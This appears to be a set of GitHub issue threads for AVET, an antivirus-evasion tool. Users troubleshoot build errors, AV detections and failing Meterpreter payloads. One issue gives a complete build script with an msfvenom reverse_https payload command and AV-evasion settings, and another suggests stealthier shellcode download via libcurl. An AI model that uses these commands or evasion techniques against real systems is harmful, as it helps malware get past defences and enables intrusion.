avet's Issues

No Window option for executable

Hi,
first of all I would like to thank you for awesome work!

Is there any option to compile the final binary in "no window" mode? I've tried multiple ways to achieve that, but with no success. Every time I launch the created binary, I can see the application window hanging in the system....

Tested on Windows 7, Windows 8.1, Windows 10

Thank you for response.

Error

Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 621 (iteration=0)
x86/shikata_ga_nai succeeded with size 648 (iteration=1)
x86/shikata_ga_nai succeeded with size 675 (iteration=2)
x86/shikata_ga_nai chosen with final size 675
Payload size: 675 bytes
Final size of c file: 2859 bytes
./format.sh: line 2: ./sh_format: cannot execute binary file: Exec format error
tr: warning: an unescaped backslash at end of string is not portable
./build/build_win32_meterpreter_rev_https_shikata_fopen.sh: line 13: ./make_avet: cannot execute binary file: Exec format error
avet.c: In function 'main':
avet.c:122:15: error: 'buf' undeclared (first use in this function)
shellcode = buf;
^
avet.c:122:15: note: each undeclared identifier is reported only once for each function it appears in

avet.c is not compiled

Hey below are the options I set

cat banner.txt
. build/global_win32.sh
. build/feature_construction.sh
. build/global_connect_config.sh
LPORT=443
LHOST=192.168.0.103
msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -b '\x00' -f raw -a x86 --platform Windows > output/thepayload.bin
set_command_source no_data
set_command_exec no_command
set_payload_source download_socket
set_decoder none
set_key_source no_data
set_payload_info_source no_data
set_payload_execution_method exec_shellcode
enable_debug_print
$win32_compiler -o output/output.exe source/avet.c -lwsock32 -lWs2_32
strip output/output.exe
cleanup_techniques

I have changed the compiler in "build/global_win32.sh" and set it to mingw cross compiler.

Mingw Dll error

I know it's not a script issue, but I can't fix the error.
```
write shellcode from sc.txt to defs.h
err:module:import_dll Library libmingwex-0.dll (which is needed by L"C:\MinGW\libexec\gcc\mingw32\6.3.0\cc1.exe") not found
err:module:import_dll Library libisl-15.dll (which is needed by L"C:\MinGW\libexec\gcc\mingw32\6.3.0\cc1.exe") not found
err:module:import_dll Library libmpc-3.dll (which is needed by L"C:\MinGW\libexec\gcc\mingw32\6.3.0\cc1.exe") not found
err:module:import_dll Library libmpfr-4.dll (which is needed by L"C:\MinGW\libexec\gcc\mingw32\6.3.0\cc1.exe") not found
err:module:LdrInitializeThunk Main exe initialization for L"C:\MinGW\libexec\gcc\mingw32\6.3.0\cc1.exe" failed, status c0000135
```

Unable to run ./format.sh command

I created the sh.txt file using msfvenom, but when I run the ./format.sh script I get the following error:

I used Kali 2.0 and installed tdm-gcc per instructions.

Thanks,

Payload not working

Hello,

I've been trying your tools and I kept it simple, using default options.
It seems that most payloads are not running (Windows 7), except for the bind ones, which seem to be fine.

Ran avet -f with meterpreter reverse tcp payload

I created a new executable with AVET and meterpreter reverse TCP payload and while AVG scans the file and finds nothing, as soon as I execute the file AVG catches it (I believe it is scanning it in memory).
Which AVs did you test this against?

How can I solve it......???

/avet# ./build/build_win32_shell_rev_tcp_shikata_fopen_kaspersky.sh -h
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai chosen with final size 414
Payload size: 414 bytes
Final size of c file: 1764 bytes
./format.sh: line 2: ./sh_format: cannot execute binary file: Exec format error
tr: warning: an unescaped backslash at end of string is not portable


Anti Virus Evasion Make Tool by Daniel Sauder
use -h for help

write shellcode from scclean.txt to defs.h

Question

Can we only use payloads created with metasploit?

Would it be a problem if we use another payload developed in C++?

Which license does apply to this work?

First of all, thanks for releasing this work on a public repository.

Nonetheless, this repo doesn't have any concrete license (or it isn't easy to see), so I would like you to consider choosing one to avoid the confusion that its absence causes. As it stands, the work falls under default copyright law, and most of us aren't sure of the implications because we aren't lawyers.

This page may help you decide which one is more convenient for you and shows all the benefits that an open license has over a closed one. However, don't get me wrong: choose the one that best fits your specific case, regardless of whether it's open or not.

Thanks for considering.

Example 1 picked up by Avast

Using the latest version of Avast (as of 20171213), Avast immediately caught it as Win64:Malware-gen. Detected by the File Shield module.

The payload was built using the instructions included in Example 1 of the README.

App crash

So I used that bash script from Example 1, compiled it with mingw, and when I open exe on my VM, I get appcrash.
virtualbox_win7_x86_02_06_2017_14_37_09

error

Hi, I use Example 1 but I get an error:
./build/build_win32_meterpreter_rev_https_20xshikata.sh
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 489 (iteration=0)
x86/shikata_ga_nai succeeded with size 516 (iteration=1)
x86/shikata_ga_nai succeeded with size 543 (iteration=2)
x86/shikata_ga_nai succeeded with size 570 (iteration=3)
x86/shikata_ga_nai succeeded with size 597 (iteration=4)
x86/shikata_ga_nai succeeded with size 624 (iteration=5)
x86/shikata_ga_nai succeeded with size 651 (iteration=6)
x86/shikata_ga_nai succeeded with size 678 (iteration=7)
x86/shikata_ga_nai succeeded with size 705 (iteration=8)
x86/shikata_ga_nai succeeded with size 732 (iteration=9)
x86/shikata_ga_nai succeeded with size 759 (iteration=10)
x86/shikata_ga_nai succeeded with size 786 (iteration=11)
x86/shikata_ga_nai succeeded with size 813 (iteration=12)
x86/shikata_ga_nai succeeded with size 840 (iteration=13)
x86/shikata_ga_nai succeeded with size 867 (iteration=14)
x86/shikata_ga_nai succeeded with size 894 (iteration=15)
x86/shikata_ga_nai succeeded with size 921 (iteration=16)
x86/shikata_ga_nai succeeded with size 948 (iteration=17)
x86/shikata_ga_nai succeeded with size 975 (iteration=18)
x86/shikata_ga_nai succeeded with size 1002 (iteration=19)
x86/shikata_ga_nai chosen with final size 1002
Payload size: 1002 bytes
Final size of c file: 4233 bytes
./build/build_win32_meterpreter_rev_https_20xshikata.sh: line 10: ./make_avet: cannot execute binary file: Exec format error
avet.c: In function 'main':
avet.c:122:15: error: 'buf' undeclared (first use in this function)
shellcode = buf;
^
avet.c:122:15: note: each undeclared identifier is reported only once for each function it appears in
What to do?

os: kali rolling 32bit

Use libcurl to download the shellcode.

I am curious why you have decided to download the shellcode via Internet Explorer, when a much stealthier approach would be to download it with libcurl and avoid opening IE.

Most *win64 payloads not working on Windows 10

Hey there!

I found your project and thought it was a super cool and impressive endeavor. I'm playing with the AVET framework on a couple of VMs, but the only *win64 script I've tried that works according to the comments in the corresponding script is the "build_disablewindefpsh_xorfromcmd_revhttps_win64.sh". I was wondering when these were last tested and what the probability is that the brokenness is from commands and techniques that are outdated instead of an operator error.

I am more than willing to accept I am doing something wrong, but I've been wrestling with it all morning, and I can't seem to find a solution that doesn't have me doing some editing beyond variable/payload replacement in the avet source.

P.S. I have Windows Defender off just to see if I can get the payload to run as expected before I check the AV evasion aspect.

no reverse connections

Thanks for your effort. Everything runs well, but there's no reverse connection when I try a win64 payload.
The payload works on Win10 and evades the antivirus, except Kaspersky, but the main problem is that there's no reverse connection.
